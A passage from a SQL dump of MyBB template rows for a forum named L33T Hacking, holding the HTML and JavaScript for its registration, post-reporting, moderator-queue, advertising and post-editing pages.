width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"hideemail\" id=\"hideemail\" value=\"1\" {$hideemailcheck} /></td>\r\n<td valign=\"top\"><span class=\"smalltext\"><label for=\"hideemail\">{$lang->hide_email}</label></span></td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"receivepms\" id=\"receivepms\" value=\"1\" {$receivepmscheck} /></td>\r\n<td valign=\"top\"><span class=\"smalltext\"><label for=\"receivepms\">{$lang->receive_pms}</label></span></td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"pmnotice\" id=\"pmnotice\" value=\"1\"{$pmnoticecheck} /></td>\r\n<td valign=\"top\"><span class=\"smalltext\"><label for=\"pmnotice\">{$lang->pm_notice}</label></span></td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"emailpmnotify\" id=\"emailpmnotify\" value=\"1\" {$emailpmnotifycheck} /></td>\r\n<td valign=\"top\"><span class=\"smalltext\"><label for=\"emailpmnotify\">{$lang->email_notify_newpm}</label></span></td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"invisible\" id=\"invisible\" value=\"1\" {$invisiblecheck} /></td>\r\n<td valign=\"top\"><span class=\"smalltext\"><label for=\"invisible\">{$lang->invisible_mode}</label></span></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\"><span class=\"smalltext\"><label for=\"subscriptionmethod\">{$lang->subscription_method}</label></span></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">\r\n <select name=\"subscriptionmethod\" id=\"subscriptionmethod\">\r\n <option value=\"0\" {$no_subscribe_selected}>{$lang->no_auto_subscribe}</option>\r\n <option value=\"1\" {$no_email_subscribe_selected}>{$lang->no_email_subscribe}</option>\r\n <option value=\"2\" {$instant_email_subscribe_selected}>{$lang->instant_email_subscribe}</option>\r\n </select>\r\n</td>\r\n</tr>\r\n\r\n</table>\r\n</fieldset>\r\n<br />\r\n<fieldset class=\"trow2\">\r\n<legend><strong><label for=\"timezone\">{$lang->time_offset}</label></strong></legend>\r\n<table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\" width=\"100%\">\r\n<tr>\r\n<td><span class=\"smalltext\">{$lang->time_offset_desc}</span></td>\r\n</tr>\r\n<tr>\r\n<td>{$tzselect}</td>\r\n</tr>\r\n<tr>\r\n<td><span class=\"smalltext\">{$lang->dst_correction}</span></td>\r\n</tr>\r\n<tr>\r\n<td>\r\n <select name=\"dstcorrection\">\r\n <option value=\"2\" {$dst_auto_selected}>{$lang->dst_correction_auto}</option>\r\n <option value=\"1\" {$dst_enabled_selected}>{$lang->dst_correction_enabled}</option>\r\n <option value=\"0\" {$dst_disabled_selected}>{$lang->dst_correction_disabled}</option>\r\n </select>\r\n</td>\r\n</tr>\r\n</table>\r\n</fieldset>\r\n<br />\r\n<fieldset class=\"trow2\">\r\n<legend><strong><label for=\"language\">{$lang->lang_select}</label></strong></legend>\r\n<table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\" width=\"100%\">\r\n<tr>\r\n<td colspan=\"2\"><span class=\"smalltext\">{$lang->lang_select_desc}</span></td>\r\n</tr>\r\n<tr>\r\n<td><select name=\"language\" id=\"language\"><option value=\"\">{$lang->lang_select_default}</option><option value=\"\">-----------</option>{$langoptions}</select></td>\r\n</tr>\r\n</table>\r\n</fieldset>\r\n</td>\r\n</tr>\r\n\r\n</table>\r\n<br />\r\n\r\n<div align=\"center\">\r\n<input type=\"hidden\" name=\"step\" value=\"registration\" />\r\n<input type=\"hidden\" name=\"action\" value=\"do_register\" />\r\n<input type=\"submit\" class=\"button\" name=\"regsubmit\" value=\"{$lang->submit_registration}\" />\r\n</div>\r\n</form>\r\n<script type=\"text/javascript\">\r\n<!--\r\n regValidator = new FormValidator(\'registration_form\');\r\n regValidator.register(\'username\', \'notEmpty\', {failure_message:\'{$lang->js_validator_no_username}\'});\r\n regValidator.register(\'email\', \'regexp\', {match_field:\'email2\', regexp:\'^([a-zA-Z0-9_\\\\.\\\\+\\\\-])+\\\\@(([a-zA-Z0-9\\\\-])+\\\\.)+([a-zA-Z0-9]{2,4})+$\', failure_message:\'{$lang->js_validator_invalid_email}\'});\r\n regValidator.register(\'email2\', \'matches\', {match_field:\'email\', status_field:\'email_status\', failure_message:\'{$lang->js_validator_email_match}\'});\r\n{$validator_extra}\r\n regValidator.register(\'username\', \'ajax\', {url:\'xmlhttp.php?action=username_availability\', loading_message:\'{$lang->js_validator_checking_username}\'}); // needs to be last\r\n// -->\r\n</script>\r\n{$footer}\r\n</body>\r\n</html>', '8', '1608', '', '1347237783'); INSERT INTO mybb_templates VALUES('1999', 'member_register_password', '<tr>\r\n<td><span class=\"smalltext\">{$lang->password}</span></td>\r\n<td><span class=\"smalltext\">{$lang->confirm_password}</span></td>\r\n</tr>\r\n<tr>\r\n<td><input type=\"password\" class=\"textbox\" name=\"password\" id=\"password\" style=\"width: 100%\" /></td>\r\n<td><input type=\"password\" class=\"textbox\" name=\"password2\" id=\"password2\" style=\"width: 100%\" /></td>\r\n</tr>\r\n<tr>\r\n <td colspan=\"2\" style=\"display: none;\" id=\"password_status\">&nbsp;</td>\r\n</tr>\r\n</span>', '8', '1608', '', '1347174323'); INSERT INTO mybb_templates VALUES('2048', 'member_profile_email', '<tr>\r\n<td class=\"trow2\"><strong>{$lang->email}</strong></td>\r\n<td class=\"trow2\"><a href=\"member.php?action=emailuser&amp;uid={$memprofile[\'uid\']}\">{$lang->send_user_email}</a></td>\r\n</tr>', '8', '1608', '', '1347237828'); INSERT INTO mybb_templates VALUES('2000', 'report', '<html>\r\n<head>\r\n<title>{$mybb->settings[\'bbname\']} - {$lang->report_post}</title>\r\n{$headerinclude}\r\n</head>\r\n<body>\r\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\r\n<tr>\r\n<td class=\"trow1\" align=\"center\">\r\n<br />\r\n<br />\r\n<strong>{$lang->report_to_mod}</strong>\r\n<form action=\"report.php\" method=\"post\">\r\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\r\n<input type=\"hidden\" name=\"action\" value=\"do_report\" />\r\n<input type=\"hidden\" name=\"pid\" value=\"{$pid}\" />\r\n<blockquote>Please report content that you think violate l33thacking rules and regulations. All reports will be dealt in their own time or the staff member has not decided to take an action on the report.</blockquote>\r\n<br />\r\n<br />\r\n<span class=\"smalltext\">{$lang->report_reason}</span>\r\n<br />\r\n<SELECT NAME=\"reason\">\r\n<OPTION VALUE=\"Ignore this report\" >Select the appropriate reason below\r\n<OPTION VALUE=\"Adult Content\" >Adult Content\r\n<OPTION VALUE=\"Cross Posting\" >Cross Posting\r\n<OPTION VALUE=\"Disallowed BH\" >Forbidden Blackhat Activity\r\n<OPTION VALUE=\"Donation begging\" >Donation Begging\r\n<OPTION VALUE=\"Infected/No scan\" >Infected Download/Link or No virus scan\r\n<OPTION VALUE=\"Leech\" >Leeched post\r\n<OPTION VALUE=\"LQP\" >Low Quality Post\r\n<OPTION VALUE=\"Off topic\" >Off Topic or Unrelated\r\n<OPTION VALUE=\"Personal info\" >Personal Data\r\n<OPTION VALUE=\"Profile Violation\" >Profile Violation\r\n<OPTION VALUE=\"Post & PM\" > Post & PM\r\n<OPTION VALUE=\"Rep Abuse\" >Reputation Abuse\r\n<OPTION VALUE=\"SPAM\" >spam\r\n<OPTION VALUE=\"Threats\" >Threats or Harassment\r\n<OPTION VALUE=\"Wrong forum\" >Wrong Section\r\n<OPTION VALUE=\"Nonsense(Other)\" >Other\r\n</SELECT> \r\n<br />\r\n<br />\r\n<div align=\"center\"><input type=\"submit\" class=\"button\" value=\"{$lang->report_post}\" /></div>\r\n</form>\r\n</td>\r\n</tr>\r\n</table>\r\n</body>\r\n</html>', '8', '1608', '', '1352577597'); INSERT INTO mybb_templates VALUES('2001', 'postbit_warninglevel', '<br />{$lang->postbit_warning_level} <a href=\"{$warning_link}\"><span style=\"color: grey;\">{$warning_level}</span></a>', '8', '1608', '', '1344902397'); INSERT INTO mybb_templates VALUES('2002', 'reputation_vote', '<tr>\r\n <td class=\"trow1 {$status_class}\">\r\n {$reputation_vote[\'username\']} <span class=\"smalltext\">{$reputation_vote[\'user_reputation\']} - {$last_updated} <!-- editlink{$reputation_vote[\'rid\']} --> {$delete_link}<br />{$postrep_given}<br /></span>\r\n <strong class=\"{$vote_type_class}\">{$vote_type} {$vote_reputation}:</strong> <span style=\"color: black;\"> {$reputation_vote[\'comments\']}</span>\r\n </td>\r\n</tr>', '8', '1608', '', '1344966352'); INSERT INTO mybb_templates VALUES('2003', 'header_welcomeblock_member_admin', '&mdash; <a href=\"{$mybb->settings[\'bburl\']}/{$config[\'admin_dir\']}/index.php\"><strong><span style=\"color: silver;\">{$lang->welcome_admin}</span></strong></a>', '8', '1608', '', '1347685279'); INSERT INTO mybb_templates VALUES('2004', 'header_welcomeblock_member_moderator', '&mdash; <a href=\"{$mybb->settings[\'bburl\']}/modcp.php\"><strong><i><span style=\"color: silver;\">{$lang->welcome_modcp}</span></i></strong></a>', '8', '1608', '', '1347685290'); INSERT INTO mybb_templates VALUES('2005', 'modcp_reports_report', '<tr>\r\n<td class=\"{$trow}\" align=\"center\"><label for=\"reports_{$report[\'rid\']}\"><a href=\"{$report[\'postlink\']}#pid{$report[\'pid\']}\" target=\"_blank\"><span style=\"color: blue;\">{$report[\'pid\']}</span></a></label></td>\r\n<td class=\"{$trow}\" align=\"center\"><a href=\"{$report[\'posterlink\']}\" target=\"_blank\"><span style=\"color: green;\">{$report[\'postusername\']}</span></a></td>\r\n<td class=\"{$trow}\"><a href=\"{$report[\'threadlink\']}\" target=\"_blank\"><span style=\"color: red;\">{$report[\'threadsubject\']}</a></td>\r\n<td class=\"{$trow}\" align=\"center\"><a href=\"{$report[\'reporterlink\']}\" target=\"_blank\"><span style=\"color: green;\">{$report[\'username\']}</span></a></td>\r\n<td class=\"{$trow}\"><span style=\"color: black;\">{$report[\'reason\']}</span></td>\r\n<td class=\"{$trow}\" align=\"center\" style=\"white-space: nowrap\"><span class=\"smalltext\"><span style=\"color: grey;\">{$reportdate}</span><br /><span style=\"color: grey;\">{$reporttime}</span></small></td>\r\n<td class=\"{$trow}\" align=\"center\"><input type=\"checkbox\" class=\"checkbox\" name=\"reports[]\" id=\"reports_{$report[\'rid\']}\" value=\"{$report[\'rid\']}\" /></td>\r\n</tr>', '8', '1608', '', '1345121292'); INSERT INTO mybb_templates VALUES('2006', 'member_register_regimage', '<br />\r\n<fieldset class=\"trow2\">\r\n<script type=\"text/javascript\" src=\"jscripts/captcha.js?ver=1400\"></script>\r\n<legend><strong>{$lang->image_verification}</strong></legend>\r\n<table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\">\r\n<tr>\r\n<td><span class=\"smalltext\">{$lang->verification_note}</span></td>\r\n<td rowspan=\"2\" align=\"center\"><img src=\"captcha.php?action=regimage&amp;imagehash={$imagehash}\" alt=\"{$lang->image_verification}\" title=\"{$lang->image_verification}\" id=\"captcha_img\" /><br /><span style=\"color: red;\" class=\"smalltext\">{$lang->verification_subnote}</span>\r\n<script type=\"text/javascript\">\r\n<!--\r\n if(use_xmlhttprequest == \"1\")\r\n {\r\n document.write(\'<br \\/><br \\/><input type=\"button\" class=\"button\" tabindex=\"10000\" name=\"refresh\" value=\"{$lang->refresh}\" onclick=\"return captcha.refresh();\" \\/>\');\r\n }\r\n// -->\r\n</script>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td><input type=\"text\" class=\"textbox\" name=\"imagestring\" value=\"\" id=\"imagestring\" style=\"width: 85%;\" /><input type=\"hidden\" name=\"imagehash\" value=\"{$imagehash}\" id=\"imagehash\" /></td>\r\n</tr>\r\n<tr>\r\n <td id=\"imagestring_status\" style=\"display: none;\" colspan=\"2\">&nbsp;</td>\r\n</tr>\r\n</table>\r\n</fieldset>', '8', '1608', '', '1345142498'); INSERT INTO mybb_templates VALUES('2007', 'postbit_signature', '<hr size=\"1\" width=\"30%\" align=\"center\" />\r\n{$post[\'signature\']}', '8', '1608', '', '1345142765'); INSERT INTO mybb_templates VALUES('2011', 'moderation_posts', '\r\n <div class=\"red_alert\">\r\nModerator Notice: Unapprove Threads: <a href=\"modcp.php?action=modqueue&type=threads\">{$unappt}</a> and Unapprove Posts: <a href=\"modcp.php?action=modqueue&type=posts\">{$unappp}</a>.\r\n </div>\r\n<br />', '-1', '0', '', '0'); INSERT INTO mybb_templates VALUES('2012', 'header', ' <div id=\"container\">\n <a name=\"top\" id=\"top\"></a>\n <div id=\"header\">\n <div class=\"logo\"><a href=\"{$mybb->settings[\'bburl\']}/index.php\"><img src=\"{$theme[\'logo\']}\" alt=\"{$mybb->settings[\'bbname\']}\" title=\"{$mybb->settings[\'bbname\']}\" /></a></div>\n <div class=\"menu\">\n <ul><img src=\"images/mods.png\"><a href=\"mods.php\">Mods Database</a>\n <li><a href=\"{$mybb->settings[\'bburl\']}/search.php\"><img src=\"{$theme[\'imgdir\']}/toplinks/search.gif\" alt=\"\" title=\"\" />{$lang->toplinks_search}</a></li>\n <li><a href=\"{$mybb->settings[\'bburl\']}/memberlist.php\"><img src=\"{$theme[\'imgdir\']}/toplinks/memberlist.gif\" alt=\"\" title=\"\" />{$lang->toplinks_memberlist}</a></li>\n <li><a href=\"{$mybb->settings[\'bburl\']}/calendar.php\"><img src=\"{$theme[\'imgdir\']}/toplinks/calendar.gif\" alt=\"\" title=\"\" />{$lang->toplinks_calendar}</a></li>\n <li><a href=\"{$mybb->settings[\'bburl\']}/misc.php?action=help\"><img src=\"{$theme[\'imgdir\']}/toplinks/help.gif\" alt=\"\" title=\"\" />{$lang->toplinks_help}</a></li>\n </ul>\n </div>\n <hr class=\"hidden\" />\n <div id=\"panel\">\n {$welcomeblock}\n </div>\n </div>\n <hr class=\"hidden\" />\n <br class=\"clear\" />\n <div id=\"content\">\n {$pm_notice}\n {$bannedwarning}\n {$bbclosedwarning}\n {$unreadreports}{$moderation_posts}\n {$pending_joinrequests}\n <navigation>\n{$affiliates_header}\n <br />\n', '1', '1608', '', '1345243126'); INSERT INTO mybb_templates VALUES('2013', 'mods', '\n<html>\n<head>\n<title>{$mybb->settings[\'modstitle\']}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr><td class=\"thead\"><strong>{$mybb->settings[\'modstitle\']}</strong></td></tr>\n<tr><td class=\"trow1\">\n{$mybb->settings[\'anytxt\']}<br/>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\" style=\"border-style:solid; border-color:#FF870F; border-collapse: collapse; \" bordercolor=\"#111111\" width=\"100%\">\n <tr>\n <td width=\"50%\" valign=\"top\" style=\"border: 1px solid #FF870F; \">\n <p style=\"margin-top: 0; margin-bottom: 0\"><b><font size=\"2\">My Codes:</font></b></p>\n <p style=\"margin-top: 0; margin-bottom: 0\"><font size=\"2\"><b>Custom MyCodes \n will be placed here.</b></font></td>\n <td width=\"50%\" valign=\"top\" style=\"border: 1px solid #FF870F; \">\n <p style=\"margin-top: 0; margin-bottom: 0\"><font size=\"2\"><b>Admin CP:</b></font></p>\n <p style=\"margin-top: 0; margin-bottom: 0\"><font size=\"2\"><b>These plugins \n will modify your forum\'s Admin CP.</b></font></td>\n </tr>\n <tr>\n <td width=\"50%\" valign=\"top\" style=\"border: 1px solid #FF870F; \">\n <font SIZE=\"2\">{$mybb->settings[\'modsmco\']}</font></td>\n <td width=\"50%\" valign=\"top\" style=\"border: 1px solid #FF870F; \">\n <font SIZE=\"2\">{$mybb->settings[\'modsacp\']}</font></td>\n </tr>\n <tr>\n <td width=\"50%\" valign=\"top\" style=\"border: 1px solid #FF870F; \">\n <p style=\"margin-top: 0; margin-bottom: 0\"><font size=\"2\"><b>Forum Display:</b></font></p>\n <p style=\"margin-top: 0; margin-bottom: 0\"><font size=\"2\"><b>These plugins \n will modify your forum\'s forumdisplay.php page.</b></font></td>\n <td width=\"50%\" valign=\"top\" style=\"border: 1px solid #FF870F; \">\n <p style=\"margin-top: 0; margin-bottom: 0\"><font size=\"2\"><b>Index:</b></font></p>\n <p style=\"margin-top: 0; margin-bottom: 0\"><font size=\"2\"><b>These plugins \n will modify your forum\'s index.php page.</b></font></td>\n </tr>\n <tr>\n <td width=\"50%\" valign=\"top\" style=\"border: 1px solid #FF870F; \">\n <font SIZE=\"2\">{$mybb->settings[\'modsfdi\']}</font></td>\n <td width=\"50%\" valign=\"top\" style=\"border: 1px solid #FF870F; \">\n <font SIZE=\"2\">{$mybb->settings[\'modsind\']}</font></td>\n </tr>\n <tr>\n <td width=\"50%\" valign=\"top\" style=\"border: 1px solid #FF870F; \">\n <p style=\"margin-top: 0; margin-bottom: 0\"><font size=\"2\"><b>Show Thread:</b></font></p>\n <p style=\"margin-top: 0; margin-bottom: 0\"><font size=\"2\"><b>These plugins \n will modify your forum\'s showthread.php page.</b></font></td>\n <td width=\"50%\" valign=\"top\" style=\"border: 1px solid #FF870F; \">\n <p style=\"margin-top: 0; margin-bottom: 0\"><font size=\"2\"><b>Miscellaneous:</b></font></p>\n <p style=\"margin-top: 0; margin-bottom: 0\"><font size=\"2\"><b>These plugins \n will modify some miscellaneous features.</b></font></td>\n </tr>\n <tr>\n <td width=\"50%\" valign=\"top\" style=\"border: 1px solid #FF870F; \">\n <font SIZE=\"2\">{$mybb->settings[\'modssth\']}</font></td>\n <td width=\"50%\" valign=\"top\" style=\"border: 1px solid #FF870F; \">\n <font SIZE=\"2\">{$mybb->settings[\'modsmis\']}</font></td>\n </tr>\n <tr>\n <td width=\"50%\" valign=\"top\" style=\"border: 1px solid #FF870F; \">\n <p style=\"margin-top: 0; margin-bottom: 0\"><font size=\"2\"><b>New Pages:</b></font></p>\n <p style=\"margin-top: 0; margin-bottom: 0\"><font size=\"2\"><b>These plugins \n will add some brand new pages.</b></font></td>\n <td width=\"50%\" valign=\"top\" style=\"border: 1px solid #FF870F; \">\n <p style=\"margin-top: 0; margin-bottom: 0\"><font size=\"2\"><b>User Profiles:</b></font></p>\n <p style=\"margin-top: 0; margin-bottom: 0\"><font size=\"2\"><b>These plugins \n will modify your forum\'s member.php page.</b></font></td>\n </tr>\n <tr>\n <td width=\"50%\" valign=\"top\" style=\"border: 1px solid #FF870F; \">\n <font SIZE=\"2\">{$mybb->settings[\'modsnpg\']}</font></td>\n <td width=\"50%\" valign=\"top\" style=\"border: 1px solid #FF870F; \">\n <font SIZE=\"2\">{$mybb->settings[\'modsupr\']}</font></td>\n </tr>\n <tr>\n <td width=\"50%\" valign=\"top\" style=\"border: 1px solid #FF870F; \">\n <p style=\"margin-top: 0; margin-bottom: 0\"><font size=\"2\"><b>Postings \n Plugins:</b></font></p>\n <p style=\"margin-top: 0; margin-bottom: 0\"><font size=\"2\"><b>These plugins \n will enhance your forum\'s postings area.</b></font></td>\n <td width=\"50%\" valign=\"top\" style=\"border: 1px solid #FF870F; \">\n <p style=\"margin-top: 0; margin-bottom: 0\"><font size=\"2\"><b>MYPS \n Extensions:</b></font></p>\n <p style=\"margin-top: 0; margin-bottom: 0\"><font size=\"2\"><b>Enhance some \n great features of MYPS with these plugins.</b></font></td>\n </tr>\n <tr>\n <td width=\"50%\" valign=\"top\" style=\"border: 1px solid #FF870F; \">\n <font SIZE=\"2\">{$mybb->settings[\'modspos\']}</font></td>\n <td width=\"50%\" valign=\"top\" style=\"border: 1px solid #FF870F; \">\n <font SIZE=\"2\">{$mybb->settings[\'modsmyps\']}</font></td>\n </tr>\n</table>\n\n<p style=\"margin-top: 0; margin-bottom: 0\" align=\"right\"><b>\n<font size=\"1\" color=\"#0000FF\">Powered by </font><font size=\"1\">\n<a href=\"http://www.mybbcodes.com/\">MyBB Codes</a><font face=\"Times New Roman\" color=\"#0000FF\">', '-1', '0', '', '0'); INSERT INTO mybb_templates VALUES('2014', 'global_adspg', '<html>\r\n<head>\r\n<title>Advertising on L33THacking</title>\r\n{$headerinclude}\r\n</head>\r\n<body>\r\n{$header}\r\n<table border=\"0\" cellspacing=\"1\" cellpadding=\"4\" class=\"tborder\">\r\n<tr>\r\n<td class=\"thead\"><span class=\"smalltext\"><strong>Advertising on L33T Hacking</strong></span></td>\r\n</tr>\r\n<tr>\r\n<td class=\"trow1\">\r\n\r\nLooking forward to advertise with L33T Hacking? Find answers to most of your questions below.\r\n<br />\r\n<br />\r\n<div style=\"color: #00AB09;font-weight: bold;\">Header Advertisement</div>\r\nOur header ad spot is permanently reserved by our ad network, so we don\'t allow Header Advertisements at all.\r\n<br />\r\n<br />\r\n<div style=\"color: #00AB09;font-weight: bold;\">Footer Advertisements</div>\r\nWe do have Footer Advertisements, we currently provide 6 footer advertisements. Each footer image(s) is required to be 88x31 in size. \r\n<br />\r\n<br />\r\n<div style=\"color: #00AB09;font-weight: bold;\">Inline ads</div>\r\nWe allow inline ads for all users exempt Staff in CLOSED threads only. When a thread is closed, then automatically ads will appear in those threads.\r\n<br />\r\n<br />\r\n<div style=\"color: #00AB09;font-weight: bold;\">Sticky Threads</div>\r\nLH offers a pay for sticky advertisement system which proves to be very successful for those who purchase stickies. The maximum paid for stickies in each section is 5 and if one section is full you can reserve your spot by PMing <a href=\"http://l33thacking.com/member.php?action=profile&uid=1\"><span style=\"color: yellow;font-weight: bold;\">T3h Jok3r</span></a>. Our sticky purchase policy is that you can\'t buy a sticky for less than a week.\r\n<br />\r\n<br />\r\n<div style=\"color: #00AB09;font-weight: bold;\"><u>FAQs</u></div>\r\n<br />\r\n<div style=\"color: #00AB09;font-weight: bold;\">Can I advertise a competing website?</div>\r\nNo, you may not.\r\n<br />\r\n<br />\r\n<div style=\"color: #00AB09;font-weight: bold;\">What payment methods does L33T Hacking accept?</div>\r\nWe only accept PayPal and haven\'t yet thought of Liberty Reserve.\r\n<br />\r\n<br />\r\n<div style=\"color: #00AB09;font-weight: bold;\">Can I buy a sticky in any section?</div>\r\nYes, you may purchase a sticky in any visible forum but once again no competing sites also if you are buying a sticky, the price varies on duration of sticky purchase.\r\n<br />\r\n<br />\r\n<div style=\"color: red;font-weight: bold;\">If you wish to purchase a stick in a section that wasn\'t mentioned then contact us via our <a hef=\"http://l33thacking.com/contact.php\">contact form</a> or by sending <a href=\"http://l33thacking.com/member.php?action=profile&uid=1\"><span style=\"color: yellow;font-weight: bold;\">T3h Jok3r</span></a> a Private Message.</div>\r\n\r\n</td></tr></table>\r\n{$footer}\r\n</body>\r\n</html>', '8', '1608', '', '1345642230'); INSERT INTO mybb_templates VALUES('2018', 'report_exists', '<html>\r\n<head>\r\n<title>{$mybb->settings[\'bbname\']} - {$lang->report_post}asdasd</title>\r\n{$headerinclude}\r\n</head>\r\n<body>\r\n<br />\r\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\r\n<tr>\r\n<td class=\"trow1\" align=\"center\">\r\n<br />\r\n<br />\r\n<strong>{$lang->report_error}</strong>\r\n<blockquote>{$lang->report_exists}</blockquote>\r\n<br /><br />\r\n<div>\r\n <script type=\"text/javascript\">\r\n <!--\r\n document.write(\'[<a href=\"javascript:history.go(-1);\">{$lang->go_back}</a>]\');\r\n document.write(\'[<a href=\"javascript:window.close();\">{$lang->close_window}</a>]\');\r\n // -->\r\n </script>\r\n</div>\r\n</td>\r\n</tr>\r\n</table>\r\n</body>\r\n</html>', '-1', '1.0', '', '1345681553'); INSERT INTO mybb_templates VALUES('2022', 'editpost_editedby', '<td class=\"trow2\"><strong>{$lang->edited_by}</strong></td>\r\n<td class=\"trow2\"><span class=\"smalltext\">\r\n<label><input type=\"checkbox\" class=\"checkbox\" name=\"disableeditedby\" value=\"1\" tabindex=\"7\" {$disableeditedby} /> {$lang->disable_edited_by}</label></span>\r\n</td>\r\n</tr>', '-1', '', '', '1345767270'); INSERT INTO mybb_templates VALUES('2023', 'editpost', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->edit_post}</title>\n{$headerinclude}\n<script type=\"text/javascript\" src=\"jscripts/post.js?ver=1400\"></script>\n</head>\n<body>\n{$header}\n{$preview}\n{$post_errors}\n{$attacherror}\n<form action=\"editpost.php\" method=\"post\" name=\"editpost\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"3\"><strong>{$lang->delete_post}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\" style=\"white-space: nowrap\"><input type=\"checkbox\" class=\"checkbox\" name=\"delete\" value=\"1\" tabindex=\"9\" /> <strong>{$lang->delete_q}</strong></td>\n<td class=\"trow1\" width=\"100%\">{$lang->delete_1}<br /><span class=\"smalltext\">{$lang->delete_2}</span></td>\n<td class=\"trow1\"><input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->delete_now}\" tabindex=\"10\" /></td>\n</tr>\n</table>\n<input type=\"hidden\" name=\"action\" value=\"deletepost\" />\n<input type=\"hidden\" name=\"pid\" value=\"{$pid}\" />\n</form>\n<br />\n<form action=\"editpost.php?pid={$pid}&amp;processed=1\" method=\"post\" enctype=\"multipart/form-data\" name=\"input\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"2\"><strong>{$lang->edit_post}</strong></td>\n</tr>\n{$loginbox}\n<tr>\n<td class=\"trow2\"><strong>{$lang->subject}</strong></td>\n<td class=\"trow2\">{$prefixselect}<input type=\"text\" class=\"textbox\" name=\"subject\" size=\"40\" maxlength=\"85\" value=\"{$subject}\" tabindex=\"1\" /></td>\n</tr>\n{$posticons}\n<tr>\n<td class=\"trow2\" valign=\"top\"><strong>{$lang->your_message}:</strong><br /><div style=\"text-align: center;\">{$smilieinserter}</div></td>\n<td class=\"trow2\">\n<textarea name=\"message\" id=\"message\" rows=\"20\" cols=\"70\" tabindex=\"3\">{$message}</textarea>\n{$codebuttons}\n</td>\n</tr>\n<tr>\n<td class=\"trow1\" valign=\"top\"><strong>{$lang->post_options}</strong></td>\n<td class=\"trow1\"><span class=\"smalltext\">\n<label><input type=\"checkbox\" class=\"checkbox\" name=\"postoptions[signature]\" value=\"1\" tabindex=\"6\"{$postoptionschecked[\'signature\']} /> {$lang->options_sig}</label>\n{$disablesmilies}</span>\n</td>\n</tr>\n{$subscriptionmethod}\n{$pollbox}{$editedby}\n</table>\n{$attachbox}\n<br />\n<div align=\"center\"><input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->update_post}\" tabindex=\"3\" accesskey=\"s\" /> <input type=\"submit\" class=\"button\" name=\"previewpost\" value=\"{$lang->preview_post}\" tabindex=\"4\" /></div>\n<input type=\"hidden\" name=\"action\" value=\"do_editpost\" />\n<input type=\"hidden\" name=\"posthash\" value=\"{$posthash}\" />\n<input type=\"hidden\" name=\"attachmentaid\" value=\"\" />\n<input type=\"hidden\" name=\"attachmentact\" value=\"\" />\n</form>\n{$footer}\n</body>\n</html>', '1', '1608', '', '1345767270'); INSERT INTO mybb_templates VALUES('2025', 'editpost', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->edit_post}</title>\n{$headerinclude}\n<script type=\"text/javascript\" src=\"jscripts/post.js?ver=1400\"></script>\n</head>\n<body>\n{$header}\n{$preview}\n{$post_errors}\n{$attacherror}\n<form action=\"editpost.php\" method=\"post\" name=\"editpost\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"3\"><strong>{$lang->delete_post}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\" style=\"white-space: nowrap\"><input type=\"checkbox\" class=\"checkbox\" name=\"delete\" value=\"1\" tabindex=\"9\" /> <strong>{$lang->delete_q}</strong></td>\n<td class=\"trow1\" width=\"100%\">{$lang->delete_1}<br /><span class=\"smalltext\">{$lang->delete_2}</span></td>\n<td class=\"trow1\"><input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->delete_now}\" tabindex=\"10\" /></td>\n</tr>\n</table>\n<input type=\"hidden\" name=\"action\" value=\"deletepost\" />\n<input type=\"hidden\" name=\"pid\" value=\"{$pid}\" />\n</form>\n<br />\n<form action=\"editpost.php?pid={$pid}&amp;processed=1\" method=\"post\" enctype=\"multipart/form-data\" name=\"input\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"2\"><strong>{$lang->edit_post}</strong></td>\n</tr>\n{$loginbox}\n<tr>\n<td class=\"trow2\"><strong>{$lang->subject}</strong></td>\n<td class=\"trow2\">{$prefixselect}<input type=\"text\" class=\"textbox\" name=\"subject\" size=\"40\" maxlength=\"85\" value=\"{$subject}\" 